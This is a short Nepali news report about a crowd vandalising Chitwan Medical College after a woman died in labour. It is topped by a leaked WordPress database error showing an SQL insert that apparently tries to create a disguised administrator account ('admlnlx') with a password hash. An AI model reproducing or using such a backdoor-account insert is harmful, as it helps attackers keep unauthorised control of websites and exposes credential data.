WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvCvVIGlJMWfoSdhFraRkAu0twa1gC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 02:50:10', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २२–
गर्भवती महिलाको ज्यान गएपछि आक्रोशित भीडले चितवन मेडिकल कलेजमा तोडफोड गरेका छन् ।
आज दिउँसो आक्रोशित भीडले अस्पतालको मुख्य गेडको सीसा तोडफोड गरेको अस्पतालले जनाएको छ । सो भीडलाई रोक्ने क्रममा तीन जना प्रहरी समेत घाईते भएको प्रहरीले जनाएको छ ।
सुत्केरी बेथा लागेकी भरतपुर उपमहानगरपालिका वडा न ७ कृष्णपुरकी २५ वर्षीया सुनिता गुरुङका मृत्यु भएपछि अस्पतालमा हिजो विहानैदेखि तनाव सिर्जना भएको थियो ।
उनलाई सुत्केरी बेथा लागेपछि सोमबार बिहान
अस्पतालमा भर्ना गरीएको मृतककी बहिनी गोरी गुरुङले बताईन् । डेलीभरी केश नर्मल रहेको र ४/५ घण्टामा डेलीभरी हुने डाक्टरले बताएपनि दिउँसो सवा १२ बजेको समयमा अस्पतालको लापरवाहीले उनकोे ज्यान गएको आरोप लगाउँदै आफन्तले प्रदर्शन गरेका हुन् ।